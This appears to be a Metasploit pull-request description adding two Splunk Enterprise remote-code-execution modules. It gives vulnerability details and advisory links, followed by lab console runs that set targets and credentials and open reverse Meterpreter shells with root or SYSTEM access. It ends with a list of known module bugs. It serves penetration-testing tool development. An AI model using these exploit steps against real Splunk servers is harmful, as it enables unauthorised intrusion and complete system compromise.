Add Splunk RCE Exploits (CVE-2022-43571 & CVE-2024-36985)

[vognik]

CVE-2022-43571

Vulnerability Details

This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.

An attacker can inject arbitrary Python code into style parameters, such as the fillColor or lineColor of a sparkline element within a Splunk SimpleXML dashboard.
The malicious code is executed when a user triggers the PDF export function for the dashboard.

The affected versions include any release prior to 8.1.12, as well as versions 8.2.0 through 8.2.9 and 9.0.0 through 9.0.2.

Module Information

Module path: modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
Platform: Linux/Unix/Windows

References

• https://advisory.splunk.com/advisories/SVD-2022-1111
• https://web.archive.org/web/20221218233608/https://psytester.github.io/CVE-2022-43571_SPLUNK_RCE/

Test Output

Linux

msf6 > use multi/http/splunk_auth_rce_cve_2022
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.139
RHOSTS => 192.168.19.139
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
RPORT => 8000
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.4
[*] Sending stage (24772 bytes) to 192.168.19.139
[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.139:59524) at 2025-12-12 15:11:44 -0500

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root

Windows

msf6 > use multi/http/splunk_auth_rce_cve_2022_43571
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.137
RHOSTS => 192.168.19.137
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
RPORT => 8000
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.6
[*] Sending stage (24772 bytes) to 192.168.19.137
[*] Meterpreter session 3 opened (192.168.19.130:4444 -> 192.168.19.137:62128) at 2025-12-12 15:21:53 -0500

meterpreter > sysinfo
Computer        : DESKTOP-vognik
OS              : Windows 10 (Build 19044)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

---

CVE-2024-36985

Vulnerability Details

This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise (splunk_archiver application).

The flaw is rooted in the unsafe use of a Splunk lookup function, specifically | copybuckets, within the splunk_archiver application, which ultimately leads to the execution of the helper script sudobash with attacker-controlled arguments.

The affected versions include any release prior to 9.0.10, as well as versions 9.1.2 through 9.1.5 and 9.2.0 through 9.2.2.

Module Information

Module path: modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
Platform: Linux/Unix

References

• https://advisory.splunk.com/advisories/SVD-2024-0705
• https://web.archive.org/web/20240914000921/https://psytester.github.io/CVE-2024-36985_SPLUNK_RCE_PoC/

Test Output

msf6 > use linux/http/splunk_auth_rce_cve_2024_36985
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RHOSTS 192.168.19.139
RHOSTS => 192.168.19.139
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RPORT 8000
RPORT => 8000
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set FETCH_SRVPORT 8090
FETCH_SRVPORT => 8090
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.4, splunk_archiver app is enabled
[*] Sending stage (3045380 bytes) to 192.168.19.139
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.139:55936) at 2025-12-12 15:04:44 -0500

meterpreter > sysinfo
Computer     : 192.168.19.139
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

[vognik]

There are a few problems:

1. When you execute | archivebuckets forcerun=1, the system takes a few seconds to drop sudobash. It seems like I need to add sleep
2. The index _internal can be empty
3. The get_apps function can't retrieve the full list of apps because it doesn't support pagination
4. When Splunk is running behind a reverse proxy, the suffix of the splunkweb_csrf_token_ cookie does not always match RHOST